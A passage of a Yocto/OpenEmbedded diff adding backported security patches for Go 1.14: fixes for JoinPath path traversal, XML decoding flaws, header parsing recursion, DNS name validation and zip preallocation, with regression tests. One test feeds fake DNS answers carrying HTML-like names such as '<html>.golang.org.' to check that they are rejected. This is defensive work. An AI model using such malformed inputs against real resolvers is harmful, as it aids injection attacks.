+From: Damien Neil <dneil@google.com>
+Date: Fri, 12 Aug 2022 16:21:09 -0700
+Subject: [PATCH 4/4] net/url: consistently remove ../ elements in JoinPath
+
+JoinPath would fail to remove relative elements from the start of
+the path when the first path element is "".
+
+In addition, JoinPath would return the original path unmodified
+when provided with no elements to join, violating the documented
+behavior of always cleaning the resulting path.
+
+Correct both these cases.
+
+    JoinPath("http://go.dev", "../go")
+    // before: http://go.dev/../go
+    // after:  http://go.dev/go
+
+    JoinPath("http://go.dev/../go")
+    // before: http://go.dev/../go
+    // after:  http://go.dev/go
+
+For #54385.
+Fixes #54635.
+Fixes CVE-2022-32190.
+
+Change-Id: I6d22cd160d097c50703dd96e4f453c6c118fd5d9
+Reviewed-on: https://go-review.googlesource.com/c/go/+/423514
+Reviewed-by: David Chase <drchase@google.com>
+Reviewed-by: Alan Donovan <adonovan@google.com>
+(cherry picked from commit 0765da5884adcc8b744979303a36a27092d8fc51)
+Reviewed-on: https://go-review.googlesource.com/c/go/+/425357
+Run-TryBot: Damien Neil <dneil@google.com>
+TryBot-Result: Gopher Robot <gobot@golang.org>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/28335508913a46e05ef0c04a18e8a1a6beb775ec]
+CVE: CVE-2022-32190
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ src/net/url/url.go | 26 ++++++++++++++++----------
+ 1 file changed, 16 insertions(+), 10 deletions(-)
+
+diff --git a/src/net/url/url.go b/src/net/url/url.go
+index 73079a5..1e8baf9 100644
+--- a/src/net/url/url.go
++++ b/src/net/url/url.go
+@@ -1109,17 +1109,23 @@ func (u *URL) UnmarshalBinary(text []byte) error {
+ // any existing path and the resulting path cleaned of any ./ or ../ elements.
+ // Any sequences of multiple / characters will be reduced to a single /.
+ func (u *URL) JoinPath(elem ...string) *URL {
+-	url := *u
+-	if len(elem) > 0 {
+-		elem = append([]string{u.EscapedPath()}, elem...)
+-		p := path.Join(elem...)
+-		// path.Join will remove any trailing slashes.
+-		// Preserve at least one.
+-		if strings.HasSuffix(elem[len(elem)-1], "/") && !strings.HasSuffix(p, "/") {
+-			p += "/"
+-		}
+-		url.setPath(p)
++	elem = append([]string{u.EscapedPath()}, elem...)
++	var p string
++	if !strings.HasPrefix(elem[0], "/") {
++		// Return a relative path if u is relative,
++		// but ensure that it contains no ../ elements.
++		elem[0] = "/" + elem[0]
++		p = path.Join(elem...)[1:]
++	} else {
++		p = path.Join(elem...)
+	}
++	// path.Join will remove any trailing slashes.
++	// Preserve at least one.
++	if strings.HasSuffix(elem[len(elem)-1], "/") && !strings.HasSuffix(p, "/") {
++		p += "/"
++	}
++	url := *u
++	url.setPath(p)
+	return &url
+ }
+
+--
+2.7.4
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2020-29510.patch b/meta/recipes-devtools/go/go-1.14/CVE-2020-29510.patch
new file mode 100644
index 0000000000..e1c9e0bdb9
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2020-29510.patch
@@ -0,0 +1,65 @@
+From a0bf4d38dc2057d28396594264bbdd43d412de22 Mon Sep 17 00:00:00 2001
+From: Filippo Valsorda <filippo@golang.org>
+Date: Tue, 27 Oct 2020 00:21:30 +0100
+Subject: [PATCH] encoding/xml: replace comments inside directives with a space
+
+A Directive (like <!ENTITY xxx []>) can't have other nodes nested inside
+it (in our data structure representation), so there is no way to
+preserve comments. The previous behavior was to just elide them, which
+however might change the semantic meaning of the surrounding markup.
+Instead, replace them with a space which hopefully has the same semantic
+effect of the comment.
+
+Directives are not actually a node type in the XML spec, which instead
+specifies each of them separately (<!ENTITY, <!DOCTYPE, etc.), each with
+its own grammar. The rules for where and when the comments are allowed
+are not straightforward, and can't be implemented without implementing
+custom logic for each of the directives.
+
+Simply preserving the comments in the body of the directive would be
+problematic, as there can be unmatched quotes inside the comment.
+Whether those quotes are considered meaningful semantically or not,
+other parsers might disagree and interpret the output differently.
+
+This issue was reported by Juho Nurminen of Mattermost as it leads to
+round-trip mismatches. See #43168. It's not being fixed in a security
+release because round-trip stability is not a currently supported
+security property of encoding/xml, and we don't believe these fixes
+would be sufficient to reliably guarantee it in the future.
+
+Fixes CVE-2020-29510
+Updates #43168
+
+Change-Id: Icd86c75beff3e1e0689543efebdad10ed5178ce3
+Reviewed-on: https://go-review.googlesource.com/c/go/+/277893
+Run-TryBot: Filippo Valsorda <filippo@golang.org>
+TryBot-Result: Go Bot <gobot@golang.org>
+Trust: Filippo Valsorda <filippo@golang.org>
+Reviewed-by: Katie Hockman <katie@golang.org>
+
+Upstream-Status: Backport from https://github.com/golang/go/commit/a9cfd55e2b09735a25976d1b008a0a3c767494f8
+CVE: CVE-2020-29510
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ src/encoding/xml/xml.go | 6 ++++++
+ 1 file changed, 6 insertions(+)
+
+diff --git a/src/encoding/xml/xml.go b/src/encoding/xml/xml.go
+index 01a1460..98647b2 100644
+--- a/src/encoding/xml/xml.go
++++ b/src/encoding/xml/xml.go
+@@ -768,6 +768,12 @@ func (d *Decoder) rawToken() (Token, error) {
+					}
+					b0, b1 = b1, b
+				}
++
++				// Replace the comment with a space in the returned Directive
++				// body, so that markup parts that were separated by the comment
++				// (like a "<" and a "!") don't get joined when re-encoding the
++				// Directive, taking new semantic meaning.
++				d.buf.WriteByte(' ')
+			}
+		}
+		return Directive(d.buf.Bytes()), nil
+--
+2.7.4
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2021-27918.patch b/meta/recipes-devtools/go/go-1.14/CVE-2021-27918.patch
new file mode 100644
index 0000000000..faa3f7f641
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2021-27918.patch
@@ -0,0 +1,191 @@
+From d0b79e3513a29628f3599dc8860666b6eed75372 Mon Sep 17 00:00:00 2001
+From: Katie Hockman <katie@golang.org>
+Date: Mon, 1 Mar 2021 09:54:00 -0500
+Subject: [PATCH] encoding/xml: prevent infinite loop while decoding
+
+This change properly handles a TokenReader which
+returns an EOF in the middle of an open XML
+element.
+
+Thanks to Sam Whited for reporting this.
+
+Fixes CVE-2021-27918
+Fixes #44913
+
+Change-Id: Id02a3f3def4a1b415fa2d9a8e3b373eb6cb0f433
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1004594
+Reviewed-by: Russ Cox <rsc@google.com>
+Reviewed-by: Roland Shoemaker <bracewell@google.com>
+Reviewed-by: Filippo Valsorda <valsorda@google.com>
+Reviewed-on: https://go-review.googlesource.com/c/go/+/300391
+Trust: Katie Hockman <katie@golang.org>
+Run-TryBot: Katie Hockman <katie@golang.org>
+TryBot-Result: Go Bot <gobot@golang.org>
+Reviewed-by: Alexander Rakoczy <alex@golang.org>
+Reviewed-by: Filippo Valsorda <filippo@golang.org>
+
+https://github.com/golang/go/commit/d0b79e3513a29628f3599dc8860666b6eed75372
+CVE: CVE-2021-27918
+Upstream-Status: Backport
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ src/encoding/xml/xml.go      |  19 ++++---
+ src/encoding/xml/xml_test.go | 104 +++++++++++++++++++++++++++--------
+ 2 files changed, 92 insertions(+), 31 deletions(-)
+
+diff --git a/src/encoding/xml/xml.go b/src/encoding/xml/xml.go
+index adaf4daf198b9..6f9594d7ba7a3 100644
+--- a/src/encoding/xml/xml.go
++++ b/src/encoding/xml/xml.go
+@@ -271,7 +271,7 @@ func NewTokenDecoder(t TokenReader) *Decoder {
+ // it will return an error.
+ //
+ // Token implements XML name spaces as described by
+-// https://www.w3.org/TR/REC-xml-names/.  Each of the
++// https://www.w3.org/TR/REC-xml-names/. Each of the
+ // Name structures contained in the Token has the Space
+ // set to the URL identifying its name space when known.
+ // If Token encounters an unrecognized name space prefix,
+@@ -285,16 +285,17 @@ func (d *Decoder) Token() (Token, error) {
+ 	if d.nextToken != nil {
+ 		t = d.nextToken
+ 		d.nextToken = nil
+-	} else if t, err = d.rawToken(); err != nil {
+-		switch {
+-		case err == io.EOF && d.t != nil:
+-			err = nil
+-		case err == io.EOF && d.stk != nil && d.stk.kind != stkEOF:
+-			err = d.syntaxError("unexpected EOF")
++	} else {
++		if t, err = d.rawToken(); t == nil && err != nil {
++			if err == io.EOF && d.stk != nil && d.stk.kind != stkEOF {
++				err = d.syntaxError("unexpected EOF")
++			}
++			return nil, err
+ 		}
+-		return t, err
++		// We still have a token to process, so clear any
++		// errors (e.g. EOF) and proceed.
++		err = nil
+ 	}
+-
+ 	if !d.Strict {
+ 		if t1, ok := d.autoClose(t); ok {
+ 			d.nextToken = t
+diff --git a/src/encoding/xml/xml_test.go b/src/encoding/xml/xml_test.go
+index efddca43e9102..5672ebb375f0d 100644
+--- a/src/encoding/xml/xml_test.go
++++ b/src/encoding/xml/xml_test.go
+@@ -33,30 +33,90 @@ func (t *toks) Token() (Token, error) {
+ 
+ func TestDecodeEOF(t *testing.T) {
+ 	start := StartElement{Name: Name{Local: "test"}}
+-	t.Run("EarlyEOF", func(t *testing.T) {
+-		d := NewTokenDecoder(&toks{earlyEOF: true, t: []Token{
+-			start,
+-			start.End(),
+-		}})
+-		err := d.Decode(&struct {
+-			XMLName Name `xml:"test"`
+-		}{})
+-		if err != nil {
+-			t.Error(err)
++	tests := []struct {
++		name   string
++		tokens []Token
++		ok     bool
++	}{
++		{
++			name: "OK",
++			tokens: []Token{
++				start,
++				start.End(),
++			},
++			ok: true,
++		},
++		{
++			name: "Malformed",
++			tokens: []Token{
++				start,
++				StartElement{Name: Name{Local: "bad"}},
++				start.End(),
++			},
++			ok: false,
++		},
++	}
++	for _, tc := range tests {
++		for _, eof := range []bool{true, false} {
++			name := fmt.Sprintf("%s/earlyEOF=%v", tc.name, eof)
++			t.Run(name, func(t *testing.T) {
++				d := NewTokenDecoder(&toks{
++					earlyEOF: eof,
++					t:        tc.tokens,
++				})
++				err := d.Decode(&struct {
++					XMLName Name `xml:"test"`
++				}{})
++				if tc.ok && err != nil {
++					t.Fatalf("d.Decode: expected nil error, got %v", err)
++				}
++				if _, ok := err.(*SyntaxError); !tc.ok && !ok {
++					t.Errorf("d.Decode: expected syntax error, got %v", err)
++				}
++			})
+ 		}
+-	})
+-	t.Run("LateEOF", func(t *testing.T) {
+-		d := NewTokenDecoder(&toks{t: []Token{
+-			start,
+-			start.End(),
+-		}})
+-		err := d.Decode(&struct {
+-			XMLName Name `xml:"test"`
+-		}{})
+-		if err != nil {
+-			t.Error(err)
++	}
++}
++
++type toksNil struct {
++	returnEOF bool
++	t         []Token
++}
++
++func (t *toksNil) Token() (Token, error) {
++	if len(t.t) == 0 {
++		if !t.returnEOF {
++			// Return nil, nil before returning an EOF. It's legal, but
++			// discouraged.
++			t.returnEOF = true
++			return nil, nil
+ 		}
+-	})
++		return nil, io.EOF
++	}
++	var tok Token
++	tok, t.t = t.t[0], t.t[1:]
++	return tok, nil
++}
++
++func TestDecodeNilToken(t *testing.T) {
++	for _, strict := range []bool{true, false} {
++		name := fmt.Sprintf("Strict=%v", strict)
++		t.Run(name, func(t *testing.T) {
++			start := StartElement{Name: Name{Local: "test"}}
++			bad := StartElement{Name: Name{Local: "bad"}}
++			d := NewTokenDecoder(&toksNil{
++				// Malformed
++				t: []Token{start, bad, start.End()},
++			})
++			d.Strict = strict
++			err := d.Decode(&struct {
++				XMLName Name `xml:"test"`
++			}{})
++			if _, ok := err.(*SyntaxError); !ok {
++				t.Errorf("d.Decode: expected syntax error, got %v", err)
++			}
++		})
++	}
+ }
+ 
+ const testInput = `
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2021-31525.patch b/meta/recipes-devtools/go/go-1.14/CVE-2021-31525.patch
new file mode 100644
index 0000000000..afe4b0d2b8
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2021-31525.patch
@@ -0,0 +1,38 @@
+From efb465ada003d23353a91ef930be408eb575dba6 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Thu, 16 Jun 2022 17:40:12 +0530
+Subject: [PATCH] CVE-2021-31525
+
+Upstream-Status: Backport [https://github.com/argoheyard/lang-net/commit/701957006ef151feb43f86aa99c8a1f474f69282]
+CVE: CVE-2021-31525
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+
+---
+ src/vendor/golang.org/x/net/http/httpguts/httplex.go | 10 ++++++----
+ 1 file changed, 6 insertions(+), 4 deletions(-)
+
+diff --git a/src/vendor/golang.org/x/net/http/httpguts/httplex.go b/src/vendor/golang.org/x/net/http/httpguts/httplex.go
+index e7de24e..c79aa73 100644
+--- a/src/vendor/golang.org/x/net/http/httpguts/httplex.go
++++ b/src/vendor/golang.org/x/net/http/httpguts/httplex.go
+@@ -137,11 +137,13 @@ func trimOWS(x string) string {
+ // contains token amongst its comma-separated tokens, ASCII
+ // case-insensitively.
+ func headerValueContainsToken(v string, token string) bool {
+-	v = trimOWS(v)
+-	if comma := strings.IndexByte(v, ','); comma != -1 {
+-		return tokenEqual(trimOWS(v[:comma]), token) || headerValueContainsToken(v[comma+1:], token)
++	for comma := strings.IndexByte(v, ','); comma != -1; comma = strings.IndexByte(v, ',') {
++		if tokenEqual(trimOWS(v[:comma]), token) {
++			return true
++		}
++		v = v[comma+1:]
+ 	}
+-	return tokenEqual(v, token)
++	return tokenEqual(trimOWS(v), token)
+ }
+ 
+ // lowerASCII returns the ASCII lowercase version of b.
+-- 
+2.25.1
+
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2021-33195.patch b/meta/recipes-devtools/go/go-1.14/CVE-2021-33195.patch
new file mode 100644
index 0000000000..3d9de888ff
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2021-33195.patch
@@ -0,0 +1,373 @@
+From 9324d7e53151e9dfa4b25af994a28c2e0b11f729 Mon Sep 17 00:00:00 2001
+From: Roland Shoemaker <roland@golang.org>
+Date: Thu, 27 May 2021 10:40:06 -0700
+Subject: [PATCH] net: verify results from Lookup* are valid domain names
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/31d60cda1f58b7558fc5725d2b9e4531655d980e]
+CVE: CVE-2021-33195
+Signed-off-by: Ralph Siemsen <ralph.siemsen@linaro.org>
+
+
+For the methods LookupCNAME, LookupSRV, LookupMX, LookupNS, and
+LookupAddr check that the returned domain names are in fact valid DNS
+names using the existing isDomainName function.
+
+Thanks to Philipp Jeitner and Haya Shulman from Fraunhofer SIT for
+reporting this issue.
+
+Updates #46241
+Fixes #46356
+Fixes CVE-2021-33195
+
+Change-Id: I47a4f58c031cb752f732e88bbdae7f819f0af4f3
+Reviewed-on: https://go-review.googlesource.com/c/go/+/323131
+Trust: Roland Shoemaker <roland@golang.org>
+Run-TryBot: Roland Shoemaker <roland@golang.org>
+TryBot-Result: Go Bot <gobot@golang.org>
+Reviewed-by: Filippo Valsorda <filippo@golang.org>
+Reviewed-by: Katie Hockman <katie@golang.org>
+(cherry picked from commit cdcd02842da7c004efd023881e3719105209c908)
+Reviewed-on: https://go-review.googlesource.com/c/go/+/323269
+---
+ src/net/dnsclient_unix_test.go | 157 +++++++++++++++++++++++++++++++++
+ src/net/lookup.go              | 111 ++++++++++++++++++++---
+ 2 files changed, 255 insertions(+), 13 deletions(-)
+
+diff --git a/src/net/dnsclient_unix_test.go b/src/net/dnsclient_unix_test.go
+index 2ad40df..b8617d9 100644
+--- a/src/net/dnsclient_unix_test.go
++++ b/src/net/dnsclient_unix_test.go
+@@ -1800,3 +1800,160 @@ func TestPTRandNonPTR(t *testing.T) {
+ 		t.Errorf("names = %q; want %q", names, want)
+ 	}
+ }
++
++func TestCVE202133195(t *testing.T) {
++	fake := fakeDNSServer{
++		rh: func(n, _ string, q dnsmessage.Message, _ time.Time) (dnsmessage.Message, error) {
++			r := dnsmessage.Message{
++				Header: dnsmessage.Header{
++					ID:                 q.Header.ID,
++					Response:           true,
++					RCode:              dnsmessage.RCodeSuccess,
++					RecursionAvailable: true,
++				},
++				Questions: q.Questions,
++			}
++			switch q.Questions[0].Type {
++			case dnsmessage.TypeCNAME:
++				r.Answers = []dnsmessage.Resource{}
++			case dnsmessage.TypeA: // CNAME lookup uses a A/AAAA as a proxy
++				r.Answers = append(r.Answers,
++					dnsmessage.Resource{
++						Header: dnsmessage.ResourceHeader{
++							Name:   dnsmessage.MustNewName("<html>.golang.org."),
++							Type:   dnsmessage.TypeA,
++							Class:  dnsmessage.ClassINET,
++							Length: 4,
++						},
++						Body: &dnsmessage.AResource{
++							A: TestAddr,
++						},
++					},
++				)
++			case dnsmessage.TypeSRV:
++				n := q.Questions[0].Name
++				if n.String() == "_hdr._tcp.golang.org." {
++					n = dnsmessage.MustNewName("<html>.golang.org.")
++				}
++				r.Answers = append(r.Answers,
++					dnsmessage.Resource{
++						Header: dnsmessage.ResourceHeader{
++							Name:   n,
++							Type:   dnsmessage.TypeSRV,
++							Class:  dnsmessage.ClassINET,
++							Length: 4,
++						},
++						Body: &dnsmessage.SRVResource{
++							Target: dnsmessage.MustNewName("<html>.golang.org."),
++						},
++					},
++				)
++			case dnsmessage.TypeMX:
++				r.Answers = append(r.Answers,
++					dnsmessage.Resource{
++						Header: dnsmessage.ResourceHeader{
++							Name:   dnsmessage.MustNewName("<html>.golang.org."),
++							Type:   dnsmessage.TypeMX,
++							Class:  dnsmessage.ClassINET,
++							Length: 4,
++						},
++						Body: &dnsmessage.MXResource{
++							MX: dnsmessage.MustNewName("<html>.golang.org."),
++						},
++					},
++				)
++			case dnsmessage.TypeNS:
++				r.Answers = append(r.Answers,
++					dnsmessage.Resource{
++						Header: dnsmessage.ResourceHeader{
++							Name:   dnsmessage.MustNewName("<html>.golang.org."),
++							Type:   dnsmessage.TypeNS,
++							Class:  dnsmessage.ClassINET,
++							Length: 4,
++						},
++						Body: &dnsmessage.NSResource{
++							NS: dnsmessage.MustNewName("<html>.golang.org."),
++						},
++					},
++				)
++			case dnsmessage.TypePTR:
++				r.Answers = append(r.Answers,
++					dnsmessage.Resource{
++						Header: dnsmessage.ResourceHeader{
++							Name:   dnsmessage.MustNewName("<html>.golang.org."),
++							Type:   dnsmessage.TypePTR,
++							Class:  dnsmessage.ClassINET,
++							Length: 4,
++						},
++						Body: &dnsmessage.PTRResource{
++							PTR: dnsmessage.MustNewName("<html>.golang.org."),
++						},
++					},
++				)
++			}
++			return r, nil
++		},
++	}
++
++	r := Resolver{PreferGo: true, Dial: fake.DialContext}
++	// Change the default resolver to match our manipulated resolver
++	originalDefault := DefaultResolver
++	DefaultResolver = &r
++	defer func() {
++		DefaultResolver = originalDefault
++	}()
++
++	_, err := r.LookupCNAME(context.Background(), "golang.org")
++	if expected := "lookup golang.org: CNAME target is invalid"; err == nil || err.Error() != expected {
++		t.Errorf("Resolver.LookupCNAME returned unexpected error, got %q, want %q", err.Error(), expected)
++	}
++	_, err = LookupCNAME("golang.org")
++	if expected := "lookup golang.org: CNAME target is invalid"; err == nil || err.Error() != expected {
++		t.Errorf("LookupCNAME returned unexpected error, got %q, want %q", err.Error(), expected)
++	}
++
++	_, _, err = r.LookupSRV(context.Background(), "target", "tcp", "golang.org")
++	if expected := "lookup golang.org: SRV target is invalid"; err == nil || err.Error() != expected {
++		t.Errorf("Resolver.LookupSRV returned unexpected error, got %q, want %q", err.Error(), expected)
++	}
++	_, _, err = LookupSRV("target", "tcp", "golang.org")
++	if expected := "lookup golang.org: SRV target is invalid"; err == nil || err.Error() != expected {
++		t.Errorf("LookupSRV returned unexpected error, got %q, want %q", err.Error(), expected)
++	}
++
++	_, _, err = r.LookupSRV(context.Background(), "hdr", "tcp", "golang.org")
++	if expected := "lookup golang.org: SRV header name is invalid"; err == nil || err.Error() != expected {
++		t.Errorf("Resolver.LookupSRV returned unexpected error, got %q, want %q", err.Error(), expected)
++	}
++	_, _, err = LookupSRV("hdr", "tcp", "golang.org")
++	if expected := "lookup golang.org: SRV header name is invalid"; err == nil || err.Error() != expected {
++		t.Errorf("LookupSRV returned unexpected error, got %q, want %q", err.Error(), expected)
++	}
++
++	_, err = r.LookupMX(context.Background(), "golang.org")
++	if expected := "lookup golang.org: MX target is invalid"; err == nil || err.Error() != expected {
++		t.Errorf("Resolver.LookupMX returned unexpected error, got %q, want %q", err.Error(), expected)
++	}
++	_, err = LookupMX("golang.org")
++	if expected := "lookup golang.org: MX target is invalid"; err == nil || err.Error() != expected {
++		t.Errorf("LookupMX returned unexpected error, got %q, want %q", err.Error(), expected)
++	}
++
++	_, err = r.LookupNS(context.Background(), "golang.org")
++	if expected := "lookup golang.org: NS target is invalid"; err == nil || err.Error() != expected {
++		t.Errorf("Resolver.LookupNS returned unexpected error, got %q, want %q", err.Error(), expected)
++	}
++	_, err = LookupNS("golang.org")
++	if expected := "lookup golang.org: NS target is invalid"; err == nil || err.Error() != expected {
++		t.Errorf("LookupNS returned unexpected error, got %q, want %q", err.Error(), expected)
++	}
++
++	_, err = r.LookupAddr(context.Background(), "1.2.3.4")
++	if expected := "lookup 1.2.3.4: PTR target is invalid"; err == nil || err.Error() != expected {
++		t.Errorf("Resolver.LookupAddr returned unexpected error, got %q, want %q", err.Error(), expected)
++	}
++	_, err = LookupAddr("1.2.3.4")
++	if expected := "lookup 1.2.3.4: PTR target is invalid"; err == nil || err.Error() != expected {
++		t.Errorf("LookupAddr returned unexpected error, got %q, want %q", err.Error(), expected)
++	}
++}
+diff --git a/src/net/lookup.go b/src/net/lookup.go
+index 9cebd10..05e88e4 100644
+--- a/src/net/lookup.go
++++ b/src/net/lookup.go
+@@ -364,8 +364,11 @@ func (r *Resolver) LookupPort(ctx context.Context, network, service string) (por
+ // LookupCNAME does not return an error if host does not
+ // contain DNS "CNAME" records, as long as host resolves to
+ // address records.
++//
++// The returned canonical name is validated to be a properly
++// formatted presentation-format domain name.
+ func LookupCNAME(host string) (cname string, err error) {
+-	return DefaultResolver.lookupCNAME(context.Background(), host)
++	return DefaultResolver.LookupCNAME(context.Background(), host)
+ }
+ 
+ // LookupCNAME returns the canonical name for the given host.
+@@ -378,8 +381,18 @@ func LookupCNAME(host string) (cname string, err error) {
+ // LookupCNAME does not return an error if host does not
+ // contain DNS "CNAME" records, as long as host resolves to
+ // address records.
+-func (r *Resolver) LookupCNAME(ctx context.Context, host string) (cname string, err error) {
+-	return r.lookupCNAME(ctx, host)
++//
++// The returned canonical name is validated to be a properly
++// formatted presentation-format domain name.
++func (r *Resolver) LookupCNAME(ctx context.Context, host string) (string, error) {
++	cname, err := r.lookupCNAME(ctx, host)
++	if err != nil {
++		return "", err
++	}
++	if !isDomainName(cname) {
++		return "", &DNSError{Err: "CNAME target is invalid", Name: host}
++	}
++	return cname, nil
+ }
+ 
+ // LookupSRV tries to resolve an SRV query of the given service,
+@@ -391,8 +404,11 @@ func (r *Resolver) LookupCNAME(ctx context.Context, host string) (cname string,
+ // That is, it looks up _service._proto.name. To accommodate services
+ // publishing SRV records under non-standard names, if both service
+ // and proto are empty strings, LookupSRV looks up name directly.
++//
++// The returned service names are validated to be properly
++// formatted presentation-format domain names.
+ func LookupSRV(service, proto, name string) (cname string, addrs []*SRV, err error) {
+-	return DefaultResolver.lookupSRV(context.Background(), service, proto, name)
++	return DefaultResolver.LookupSRV(context.Background(), service, proto, name)
+ }
+ 
+ // LookupSRV tries to resolve an SRV query of the given service,
+@@ -404,28 +420,82 @@ func LookupSRV(service, proto, name string) (cname string, addrs []*SRV, err err
+ // That is, it looks up _service._proto.name. To accommodate services
+ // publishing SRV records under non-standard names, if both service
+ // and proto are empty strings, LookupSRV looks up name directly.
+-func (r *Resolver) LookupSRV(ctx context.Context, service, proto, name string) (cname string, addrs []*SRV, err error) {
+-	return r.lookupSRV(ctx, service, proto, name)
++//
++// The returned service names are validated to be properly
++// formatted presentation-format domain names.
++func (r *Resolver) LookupSRV(ctx context.Context, service, proto, name string) (string, []*SRV, error) {
++	cname, addrs, err := r.lookupSRV(ctx, service, proto, name)
++	if err != nil {
++		return "", nil, err
++	}
++	if cname != "" && !isDomainName(cname) {
++		return "", nil, &DNSError{Err: "SRV header name is invalid", Name: name}
++	}
++	for _, addr := range addrs {
++		if addr == nil {
++			continue
++		}
++		if !isDomainName(addr.Target) {
++			return "", nil, &DNSError{Err: "SRV target is invalid", Name: name}
++		}
++	}
++	return cname, addrs, nil
+ }
+ 
+ // LookupMX returns the DNS MX records for the given domain name sorted by preference.
++//
++// The returned mail server names are validated to be properly
++// formatted presentation-format domain names.
+ func LookupMX(name string) ([]*MX, error) {
+-	return DefaultResolver.lookupMX(context.Background(), name)
++	return DefaultResolver.LookupMX(context.Background(), name)
+ }
+ 
+ // LookupMX returns the DNS MX records for the given domain name sorted by preference.
++//
++// The returned mail server names are validated to be properly
++// formatted presentation-format domain names.
+ func (r *Resolver) LookupMX(ctx context.Context, name string) ([]*MX, error) {
+-	return r.lookupMX(ctx, name)
++	records, err := r.lookupMX(ctx, name)
++	if err != nil {
++		return nil, err
++	}
++	for _, mx := range records {
++		if mx == nil {
++			continue
++		}
++		if !isDomainName(mx.Host) {
++			return nil, &DNSError{Err: "MX target is invalid", Name: name}
++		}
++	}
++	return records, nil
+ }
+ 
+ // LookupNS returns the DNS NS records for the given domain name.
++//
++// The returned name server names are validated to be properly
++// formatted presentation-format domain names.
+ func LookupNS(name string) ([]*NS, error) {
+-	return DefaultResolver.lookupNS(context.Background(), name)
++	return DefaultResolver.LookupNS(context.Background(), name)
+ }
+ 
+ // LookupNS returns the DNS NS records for the given domain name.
++//
++// The returned name server names are validated to be properly
++// formatted presentation-format domain names.
+ func (r *Resolver) LookupNS(ctx context.Context, name string) ([]*NS, error) {
+-	return r.lookupNS(ctx, name)
++	records, err := r.lookupNS(ctx, name)
++	if err != nil {
++		return nil, err
++	}
++	for _, ns := range records {
++		if ns == nil {
++			continue
++		}
++		if !isDomainName(ns.Host) {
++			return nil, &DNSError{Err: "NS target is invalid", Name: name}
++		}
++	}
++	return records, nil
+ }
+ 
+ // LookupTXT returns the DNS TXT records for the given domain name.
+@@ -441,14 +511,29 @@ func (r *Resolver) LookupTXT(ctx context.Context, name string) ([]string, error)
+ // LookupAddr performs a reverse lookup for the given address, returning a list
+ // of names mapping to that address.
+ //
++// The returned names are validated to be properly formatted presentation-format
++// domain names.
++//
+ // When using the host C library resolver, at most one result will be
+ // returned. To bypass the host resolver, use a custom Resolver.
+ func LookupAddr(addr string) (names []string, err error) {
+-	return DefaultResolver.lookupAddr(context.Background(), addr)
++	return DefaultResolver.LookupAddr(context.Background(), addr)
+ }
+ 
+ // LookupAddr performs a reverse lookup for the given address, returning a list
+ // of names mapping to that address.
+-func (r *Resolver) LookupAddr(ctx context.Context, addr string) (names []string, err error) {
+-	return r.lookupAddr(ctx, addr)
++//
++// The returned names are validated to be properly formatted presentation-format
++// domain names.
++func (r *Resolver) LookupAddr(ctx context.Context, addr string) ([]string, error) {
++	names, err := r.lookupAddr(ctx, addr)
++	if err != nil {
++		return nil, err
++	}
++	for _, name := range names {
++		if !isDomainName(name) {
++			return nil, &DNSError{Err: "PTR target is invalid", Name: addr}
++		}
++	}
++	return names, nil
+ }
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2021-33196.patch b/meta/recipes-devtools/go/go-1.14/CVE-2021-33196.patch
new file mode 100644
index 0000000000..2e2dc62c49
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2021-33196.patch
@@ -0,0 +1,124 @@
+From 74242baa4136c7a9132a8ccd9881354442788c8c Mon Sep 17 00:00:00 2001
+From: Roland Shoemaker <roland@golang.org>
+Date: Tue, 11 May 2021 11:31:31 -0700
+Subject: [PATCH] archive/zip: only preallocate File slice if reasonably sized
+
+Since the number of files in the EOCD record isn't validated, it isn't
+safe to preallocate Reader.Files using that field. A malformed archive
+can indicate it contains up to 1 << 128 - 1 files. We can still safely
+preallocate the slice by checking if the specified number of files in
+the archive is reasonable, given the size of the archive.
+
+Thanks to the OSS-Fuzz project for discovering this issue and to
+Emmanuel Odeke for reporting it.
+
+Fixes #46242
+Fixes CVE-2021-33196
+
+Change-Id: I3c76d8eec178468b380d87fdb4a3f2cb06f0ee76
+Reviewed-on: https://go-review.googlesource.com/c/go/+/318909
+Trust: Roland Shoemaker <roland@golang.org>
+Trust: Katie Hockman <katie@golang.org>
+Trust: Joe Tsai <thebrokentoaster@gmail.com>
+Run-TryBot: Roland Shoemaker <roland@golang.org>
+TryBot-Result: Go Bot <gobot@golang.org>
+Reviewed-by: Katie Hockman <katie@golang.org>
+Reviewed-by: Joe Tsai <thebrokentoaster@gmail.com>
+
+Upstream-Status: Backport
+CVE: CVE-2021-33196
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ src/archive/zip/reader.go      | 10 +++++-
+ src/archive/zip/reader_test.go | 59 ++++++++++++++++++++++++++++++++++
+ 2 files changed, 68 insertions(+), 1 deletion(-)
+
+Index: go/src/archive/zip/reader.go
+===================================================================
+--- go.orig/src/archive/zip/reader.go
++++ go/src/archive/zip/reader.go
+@@ -84,7 +84,15 @@ func (z *Reader) init(r io.ReaderAt, siz
+ 		return err
+ 	}
+ 	z.r = r
+-	z.File = make([]*File, 0, end.directoryRecords)
++	// Since the number of directory records is not validated, it is not
++	// safe to preallocate z.File without first checking that the specified
++	// number of files is reasonable, since a malformed archive may
++	// indicate it contains up to 1 << 128 - 1 files. Since each file has a
++	// header which will be _at least_ 30 bytes we can safely preallocate
++	// if (data size / 30) >= end.directoryRecords.
++	if (uint64(size)-end.directorySize)/30 >= end.directoryRecords {
++		z.File = make([]*File, 0, end.directoryRecords)
++	}
+ 	z.Comment = end.comment
+ 	rs := io.NewSectionReader(r, 0, size)
